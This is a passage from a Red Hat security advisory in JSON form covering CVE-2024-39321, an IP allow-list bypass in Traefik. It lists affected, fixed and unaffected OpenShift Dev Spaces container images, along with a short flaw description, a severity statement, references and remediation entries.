            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2296009"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "An authorization bypass vulnerability was found in Traefik. This flaw allows bypassing IP allow-lists via HTTP/3 early data requests in QUIC 0-RTT handshakes sent with spoofed IP addresses.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "traefik: Bypassing IP allow-lists via HTTP/3 early data requests in QUIC 0-RTT handshakes",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "The vulnerability in Traefik that allows bypassing IP allow-lists via HTTP/3 early data requests in QUIC 0-RTT handshakes, while notable, is categorized as moderate severity rather than important. This classification stems from the requirement for an attacker to leverage HTTP/3\u0027s early data feature and perform spoofed IP address manipulation to exploit the flaw. As a result, successful exploitation demands specific conditions, including network-level access and manipulation capabilities, which may not be trivial in many environments.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64"
        ],
        "known_not_affected": [
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2024-39321"
        },
        {
          "category": "external",
          "summary": "RHBZ#2296009",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2296009"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2024-39321",
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-39321"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-39321",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39321"
        },
        {
          "category": "external",
          "summary": "https://github.com/traefik/traefik/releases/tag/v2.11.6",
          "url": "https://github.com/traefik/traefik/releases/tag/v2.11.6"
        },
        {
          "category": "external",
          "summary": "https://github.com/traefik/traefik/releases/tag/v3.0.4",
          "url": "https://github.com/traefik/traefik/releases/tag/v3.0.4"
        },
        {
          "category": "external",
          "summary": "https://github.com/traefik/traefik/releases/tag/v3.1.0-rc3",
          "url": "https://github.com/traefik/traefik/releases/tag/v3.1.0-rc3"
        },
        {
          "category": "external",
          "summary": "https://github.com/traefik/traefik/security/advisories/GHSA-gxrv-wf35-62w9",
          "url": "https://github.com/traefik/traefik/security/advisories/GHSA-gxrv-wf35-62w9"
        }
      ],
      "release_date": "2024-07-04T00:00:00+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2025-09-15T16:27:40+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant to your system have been applied. For details on how to apply this update, refer to: https://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2025:15847"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64",
